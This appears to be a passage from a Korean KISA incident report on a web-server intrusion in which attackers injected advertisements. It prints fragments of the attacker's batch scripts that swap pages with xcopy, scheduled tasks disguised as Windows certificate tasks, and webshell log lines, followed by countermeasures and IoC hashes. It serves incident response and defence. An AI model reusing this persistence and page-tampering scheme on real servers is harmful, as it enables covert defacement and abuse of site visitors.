    따라서 변조용 압축파일의 설정파일 SCFConfig.dat에 기록된 MD5 해시값만 다르고 원복용 

압축파일의  설정파일인  SCFConfig.dat과  동일하다.

    단,  SCF1.dat는  3차  웹셸  파일이므로  변조용  및  원복원  압축파일  모두에서  동일하다.

                   
                                                                                               
     
Korea  Internet  &  Security  Agency

21

  ◌  광고  코드가  삽입된  웹페이지로  변경하는  winrmr.cmd

winrmr.cmd는 정상페이지를 광고 코드가 삽입된 웹페이지(이하,  광고페이지)로 변경하는 배치파일이고 

주요기능은  아래와  같다.

1.  광고페이지들이  압축된  winrnr.cmd을  압축해제  프로그램인  WinRAR.exe을  호출하여  압축  해제

2.  해시값을  추출하는  winrmr.vbs를  호출하여  광고페이지  목록  중  원복된  정상페이지들을  식별

3.  윈도우  내부명령어  xcopy를  호출하여  전  단계  2번에서  식별한  정상페이지들을  광고페이지들로  변경

    winrmr.cmd는 변조용 배치파일이다. 파일변조를 위해 사용하는 주요기능은 3가지이며, 

세부내용은  아래와  같다.

    ▿  winrmr.cmd  기능Ⅰ

광고페이지들이  압축되어  있는  winrnr.cmd을  대상으로  압축해제  프로그램인  WinRAR.exe을  호출하여  압축  해제

    변조용 배치파일 winrmr.cmd의 첫번째 기능은 압축해제 프로그램  호출이다. 압축파일 

winrnr.cmd를  대상으로  winsrs.exe로  이름지어진  RAR.exe을  통해  압축  해제한다.  압축 

해제된  폴더에는  기존  정상페이지에  광고  코드가  삽입된  변조페이지들이  있다.

출처:  winrmr.cmd  파일내용  일부

(생략)
set  "DataRes=  winrnr.cmd“

(생략)
for  %%a  in  ("%DataRes%")  do  (

        set  /a  Num+=1

        set  "ResBAK=%%~a"

)

(생략)
winsrs  e  "%ResBAK%"  -hp"    "  "%~1"  -o+  -idcq  >nul  2>nul

goto  :eof

(생략)

[  winrmr.cmd  첫번째  기능  ]

    ▿  winrmr.cmd  기능Ⅱ

해시값을  추출하는  winrmr.vbs를  호출하여  광고페이지  목록  중  원복된  정상페이지들을  식별

    변조용  배치파일  winrmr.cmd의  두번째  기능은  해시값을  구하는  VB스크립트  파일인 

winrmr.vbs  호출부터  시작한다.  앞서  압축  해제된  폴더에는  설정파일인  SCFConfig.dat가   

포함되어  있다.  변조용  배치파일은  winrmr.vbs에게  설정파일의  두번째  필드에  기록된 

                   
                                                                                               
     
     
     
Korea  Internet  &  Security  Agency

22

드라이브명\경로\파일에 대한 해시값을 구하게 한다. 이어서 변조용 배치파일은 앞서 구한 

해시값을 설정파일의 세번째 필드에 기록된 해시값과 다른 경우 다음에 나올 세번째 기능을 

수행한다.

    요약하면,  광고페이지  파일목록  중에  원복된  정상페이지들을  찾는  것이다.

출처:  winrmr.cmd  파일내용  일부

(생략)
for  /f  "delims="  %%i  in  ('cscript  /nologo  winrmr.vbs  "%ScrFile%"')  do  (

        if  not  "%%~i"=="%~3"  (

                call  :  hfwj  "%~1"  "%ScrFile%"

        )

(생략)

[  winrmr.cmd  두번째  기능  ]

    ▿  winrmr.cmd  기능Ⅲ

윈도우  내부명령어  xcopy를  호출하여  앞  단계에서  식별한  정상페이지들을  광고페이지들로  변경

    변조용 배치파일 winrmr.cmd의 세번째 기능은 파일복사다. 윈도우 운영체제 내부명령어인 

xcopy를  사용하여  변조용  배치파일의  두번째  기능으로  식별했던  원복된  정상페이지를 

대상으로 광고페이지로  교체한다. 이때,  공격자는 xcopy  옵션으로 숨겨진 파일과  시스템 

파일도 복사하고, 읽기 전용 파일을 겹쳐쓰게 하였으며, 기존 대상 파일을 덮어쓸지 여부를 

묻지  않게  설정하였다.

출처:  winrmr.cmd  파일내용  일부

(생략)
        echo  f|xcopy  /h/r/y  "%~1"  "%~2"  >nul  2>nul

(생략)

[  winrmr.cmd  세번째  기능  ]

  ◌  정상  웹페이지로  변경하는  winrsr.cmd

winrsr.cmd는  광고페이지를  정상페이지로  원복하는  배치파일이다.

    winrsr.cmd는  원복용  배치파일로서  압축해제  대상만  원복용  압축파일인  winsrs.cmd만 

다를  뿐  모든  스크립트의  내용은  변조용  배치파일인  winrmr.cmd과  동일하다.

                   
                                                                                               
     
     
Korea  Internet  &  Security  Agency

23

    공격자는 3차 웹셸(overview.asp)로 명령어실행도구를 이용해 작업스케줄 2개를 등록하였다.

    공격자는  변조용  작업스케줄인  CredentialTask를  등록하였다.

출처:  WEBLOG  (UTC+0)

2020-12-02  05:44:39  175.x.x.x  POST  /eng/business/overview.asp  -  80  -  45.66.x.x  Mozilla/5.0+(Win
dows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+S
afari/537.36  http://www.x.x.kr/  200  0  64  421

[  3차  웹셸로  작업스케줄  CredentialTask  설정  관련  웹로그(UTC+0)  ]

출처:  $MFT  (UTC+0)

[  CredentialTask의  생성시간  관련  메타정보  ]

    공격자는  관리자가  서버에  접속하지  않는  경우를  아래와  같이  몇  가지  조건들로  산정하여 

해당  조건에  하나라도  만족하면  변조용  배치파일인  winrmr.cmd가  실행되게  설정하였다.

  *  변조  조건:  워크스테이션  잠금,  원격데스트톱  세션연결  해제  등

출처:  활성상태의  작업스케줄  목록

#Fields:  "Name","Description","Command","Triggers","Account","Signature","Signer","SignTimeStamp

","Signer2","SignTimeStamp2"

"Microsoft\\Windows\\CertificateServicesClient\\CredentialTask","This  task  enrolls  a  certificate 
for  Attestation  Identity  Key.","C:\\Windows\\SysWOW64\\winrmr.cmd","[워크스테이션  잠금 
상태];[터미널서버  세션  연결  해제]  원격에서  사용자  세션  연결  해제;[터미널서버  세션  연결  해제] 
로컬에서  사용자  세션  연결  해제","SYSTEM","FALSE","","","",""

[  CredentialTask  정보  ]

    공격자는  원복용  작업스케줄인  CertificateTask를  등록하였다.

출처:  WEBLOG  (UTC+0)

2020-12-02  05:44:46  175.x.x.x  POST  /eng/business/overview.asp  -  80  -  45.66.134.216  Mozilla/5.0+
(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.6
6+Safari/537.36  http://www.x.x.kr/  200  0  0  390

[  3차  웹셸로  작업스케줄  CertificateTask  설정  관련  웹로그(UTC+0)  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

24

출처:  $MFT  (UTC+0)

[  CertificateTask의  생성시간  관련  메타정보  ]

    공격자는  관리자가  서버에  접속하는  경우를  아래와  같이  몇  가지  조건들로  산정하여 

해당  조건에  하나라도  만족하면  원복용  배치파일인  winrsr.cmd가  실행되게  설정하였다.

  *  원복  조건:  로그온,  원격데스크톱  세션  연결  등

출처:  활성상태의  작업스케줄  목록

"Microsoft\\Windows\\CertificateServicesClient\\CertificateTask","Certificate  Services  Client  aut
omatically  manages  digital  identities  such  as  Certificates,  Keys  and  Credentials  for  the  users  an
d  the  machine,  enabling  enrollment,  roaming  and  other  services.","C:\\Windows\\SysWOW64
\\winrsr.cmd","[로그온]  사용자가  로그온할때;[터미널서버  세션  연결  상태]  원격에서  사용자  세션 
연결;[터미널서버  세션  연결  상태]  로컬에서  사용자  세션  연결;[워크스테이션  잠금  해제]","SYSTEM",
"FALSE","","","",""

[  CertificateTask  정보  ]

    이후에도 공격자는 3차 웹셸(overview.asp)로 명령어실행도구를 이용해 악성행위를 했다.

출처:  Security(Eventlog)

[  웹셸을  이용한  명령어실행도구  로그인  관련  로그  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

25

Ⅱ.  본론  –  C.  대응  방안

    공격자  사용한  상세전략을  나열하면  아래와  같고,  주제별로  아래와  같은  대응  방안을 

적용해  볼  수  있다.

1.  웹셸  관련  공격의  대응방안

1.  Initial  Access(Exploit  Public-Facing  Application)

2.  Persistence(Server  Software  Component.Web  Shell)

※  파일업로드  웹  취약점을  이용한  1차  웹셸  업로드  및  1차  웹셸을  통한  2차  웹셸  업로드

대응  방안

▶  (주기적인  웹로그  분석을  통해)  미사용  페이지  확인  및  삭제

파일업로드 

취약점보완

▶  오픈소스  게시판  보안패치  적용

▶  확장자  및  MIME-type  제어로  화이트리스트  파일종류만  업로드  허용

▶  업로드  경로명  및  파일명을  추정하기  어렵게  변경

▶  업로드  파일이  저장되는  디렉토리(폴더)  실행권한  제거

•  IIS  웹서버:  업로드  폴더  우클릭>등록정보>디렉토리>실행권한  "없음“

1. IIS(인터넷  정보  서비스)  관리자를  실행.

2. IIS  관리자를  통해  업로드  폴더로  이동한  후,  [처리기  매핑]을  클릭

3. 우측  “기능  사용  권한  편집”을  클릭

4. 기능  사용  권한  편집에서  “스크립트”  >  “실행”  선택을  해제

•  Apache  웹서버

    ◯1   Apache  설정  파일(/etc/httpd/conf/httpd.conf)  수정

<Directory  “/usr/local/apache”> 

AllowOverride  FileInfo

</Directory>

    ◯2   파일  업로드  디렉토리에  아래와  같은  .htaccess  파일  생성

<.htaccess>

<FilesMatch  “\.(ph|inc|lib)”>

Order  allow,  deny

Deny  from  all

</FilesMatch>

AddType  text/html  .html  .htm  .ph  .php  .php3  .php4  .phtml  .phps 

.in  .cgi  .pl  .shtml  .jsp 

                   
                                                                                               
Korea  Internet  &  Security  Agency

26

웹셸 

탐지

▶  주기적으로  웹셸  파일  생성  및  악용  여부  탐지

•  주기적인  웹로그  분석을  통해  비정상  호출  페이지  식별  및  소스코드  확인

•  웹셸  탐지  시스템  운영  권고

    ○  한국인터넷진흥원의  중소기업을  대상으로  무료도구  “휘슬”

- 보호나라(www.boho.or.kr)  >  다운로드  >  휘슬  >  신청서  다운로드 

후  신청

▶  IIS  7.0의  경우

  ◯1   인터넷  정보  서비스(IIS)  관리자  >  해당  사이트  >  IIS  >  ASP

  ◯2   “부모  경로  사용”  항목을  False로  설정

상위  디렉토리

  접근  제한

2.  권한상승도구  등  악성파일  공격의  대응방안

3.  Privilege  Escalation(Exploitation  for  Privilege  Escalation)

4.  Persistence(Valid  Accounts)

5.  Credential  Access(OS  Credential  Dumping.LSASS  Memory)

※  권한상승도구(JuicyPotato)  및  권한복사도구(UserClone),  계정탈취도구(mimikatz)  실행

대응  방안

백신  최신패치  유지  및 

▶  서버  및  PC에  백신을  설치하고  실시간  감시  기능  실행  및 

실시간  기능  활성화

      자동  업데이트  설정

운영체제  업그레이드 

및  최신보안  패치  적용

▶ 제조사 기술지원이 종료된 운영체제를 사용할 경우, 보안패치를 적용할 수 

없어  시간이  경과할수록  취약한  운영환경에  노출됨  →  최신  운영체제로 

업그레이드하고  보안패치를  적용하여  권한상승도구  등의  실행을  제한

▶  서버간  접근하여  비밀번호를  입력하여  운영할  경우,  계정탈취도구를  통해 

안전한  관리용 

피해서버에서 접근했던 모든 서버의 접속정보 탈취가 가능 → 인터넷이 차단된 

단말운영  및  서버간 

전용  관리  단말을  통해  개별  서버를  접속

접근제어  설정

비밀번호  관리

▶  서버간  화이트리스트만  접근이  가능하도록  접근제어  설정

▶  주기적으로  비밀번호를  변경하여  공격자의  지속적인  로그인을  차단

▶  서버별로  비밀번호를  상이하게  설정하되,  패턴  추출이  불가하게,  최대한 

긴  비밀번호  설정

▶  AD  관리용  비밀번호로  서버  접속  금지

                   
                                                                                               
Korea  Internet  &  Security  Agency

27

3.  명령어실행도구  등  설치  공격의  대응방안

6.  Privilege  Escalation.Access  Token  Manipulation

7.  Defense  Evasion.Hide  Artifacts.Hidden  Files  and  Directories

8.  Impact.Data  Manipulation.Stroed  Data  Manipulation

※  명령어실행도구(Sy_Runas)  및  파일변조  및  은닉  등  공격도구  설치  및  실행

대응  방안

파일  모니터링

▶  공격자는  탐지회피를  위해  정상  웹페이지에  스크립트를  삽입하여  웹셸 

  강화

기능을  추가하였으므로,  소스코드에  대한  주기적인  파일  무결성  검사

▶  사용하지  않는  기본계정  활성화여부  등  비정상  계정  생성  여부  모니

터링

•  확인방법  :  명령프롬프트(cmd)에서  ‘net  user’  입력

비정상  계정  생성  여부 

모니터링

▶  Guest  계정  비활성화 

1.  [제어판]  >  [시스템  및  보안]  >  [관리  도구]  >  [컴퓨터  관리]  클릭 

2.  [로컬  사용자  및  그룹]  >  [사용자]  >  [Guest]  클릭 

3.  [일반  탭]  >  “계정  사용  안  함”  선택  >  “확인”클릭

4.  일반  대응방안

    공격자의  침해행위에  대한  효과적인  분석  및  대응을  위한  권고사항은  아래와  같다.

대응  방안

로그  설정

강화

▶  침해사고  후  재발방지를  위한  효과적인  분석  및  대응을  위하여  →  [한국

인터넷진흥원]  “한눈에  보는  로그  설정  노트(Windows)”를  참고하여  로그 

설정을  강화  권고

웹  서버  보안  강화 

▶  [한국인터넷진흥원]  “웹  서버  보안  강화  안내서”의  내용을  참조하여  웹 

안내서  적용

서버  내  보안  조치  적용을  권고

웹방화벽

적용

▶  웹서버를  운영하는  경우,  어플리케이션  공격에  대한  효과적인  탐지  및 

차단을  위해  웹방화벽  운영  권고

    ○  한국인터넷진흥원의  중소기업을  대상으로  무료도구  “휘슬”

- 보호나라(www.boho.or.kr)  >  다운로드  >  캐슬  >  신청서  다운로드 

후  신청

                   
                                                                                               
Korea  Internet  &  Security  Agency

28

취약점 

점검

▶  주기적인  (웹)  취약점  점검을  통해  노출되는  위협요소  제거

  ○  한국인터넷진흥원의  중소기업을  대상으로  무료  “웹  취약점  점검”

- 보호나라(www.boho.or.kr)  >  보안서비스  >  웹  취약점  점검  >  신청

서  다운로드  후  신청

5.  피해여부  점검방법

    `[참고], 주요 공격지표(30 페이지)` 에 대해 운영 중인 웹서버를 대상으로 공격도구 해시값 

일치여부 확인한다. 일치하는 파일을 별견 시 해당 파일을 삭제하고 대응방안에 따라 보안성을 

강화한다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

29

Ⅲ.  결론

    한국인터넷진흥원은  공격에  악용된  광고  코드를  활용하여  동일한  코드가  삽입된  추가 

피해  홈페이지들을  확인하였다.  침해사고  대응과정에서  해당  코드가  삽입된  홈페이지 

관리자와  인터뷰하였고,  아래와  같은  몇  가지  사실을  확인할  수  있었다. 

    광고 삽입 사고를 대하는 몇몇 관리자의 첫인상은 “평안”이였다.  피해기업이 직접 올린 

광고는  아니지만,  고객과  자사에  별다른  피해가  없으니  괜찮다는  것이다.

    여타 침해사고와 달리 광고 삽입 사고는 그 결과가 평범해 보이기 때문일 것이다. 홈페이지 

첫 화면이 해커의 경고문으로 도배되어 방문자 누구라도 해킹을 인지할 수 있는 전형적인 

홈페이지  변조사고도  아니고,  랜섬웨어  감염처럼  중요파일이  암호화되어  업무마비가  온 

것도 아니고, 개인정보 및 회사 기밀정보가 다크웹에 공개되어 사회적 이슈가 된 사고와도 

다르기 때문이다. 그렇다고 악성코드 유포지 혹은 악성코드 경유지, 명령제어서버로 악용되어 

피해자로부터  항의를  받고  있는  것도  아니기  때문이다.

    그런데, 광고 삽입 사고의 피해가 크지 않다고 생각하여 관리자가 대응하지 않는다면 

기업에  큰  피해를  가져오는  사고로  이어질  수  있다.

    한국인터넷진흥원은 비정상 광고가 삽입된 모든 피해서버에서 시스템 및 관리자 

권한 탈취 사실을 확인하였다. 본 사례에서는 공격자가 탈취한 권한으로 광고 삽입만 

수행했지만,  공격자가  마음만  먹는다면  기업에서  운영하는  대부분의  서버를 

암호화하여  복구를  대가로  돈을  요구하는  랜섬웨어  공격이나  내부  중요  자료를 

탈취하여  이용할  수도  있기  때문에  기업  관리자는  본  문서의  대응방안을  참고하여 

보안을  강화하는  것이  필요하다.

    사례분석을  통해  확인할  수  있었던  또  다른  사실은  한  서버에  다양한  도메인이 

웹  서비스되고  있는  경우,  침투가  시작된  홈페이지뿐만  아니라  다른  홈페이지에도 

광고가  삽입될  수  있다는  것이다. 

    따라서 웹호스팅  기업 등 다수 도메인을 운영하는 기업은 광고가 삽입된 홈페이지 

확인  시  추가  피해를  방지하기  위해  사고원인을  찾아  제거해야  할  것이다. 

    비정상 광고 삽입사고의 근본적인 침투원인을 식별하고 대응하는데 이 자료가 작은 

보탬이  되길  바란다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

30

[참고]  주요  공격지표(IoC)

명령어실행도구(구분,  파일명,  MD5)

명령어실행도구,  wiatrace.log,  a49d10b6406a1d77a65aa0e0b05154c3

※  권한상승도구(JuicyPotato)  및  권한복사도구(UserClone),  계정탈취도구(mimikatz)는  삭제되어 

해시값  추출  불가

  광고  코드  삽입  도구(구분,  파일명,  MD5)

원복용  배치파일,  winrsr.cmd,  F3F1C8953A8FDEEB6B5D19FF3E8088E4

변조용  배치파일,  winrmr.cmd,  647E6257CA696092E19998A22E551800

해시값  추출파일,  winrmr.vbs,  CD664EC454C56F7EEBC4FFE4FE881343

압축  프로그램,  winsrs.exe,  EE77A9E916A090BE1E10EC9D6DA67D48(정상파일)

※ 광고관련 다른 샘플들(winrnr.cmd, winsrs.cmd, 3차  웹셸,  광고 코드가 삽입된 웹페이지 파일)은 

피해기업에  의존적인  파일이므로  생략

                   
                                                                                               
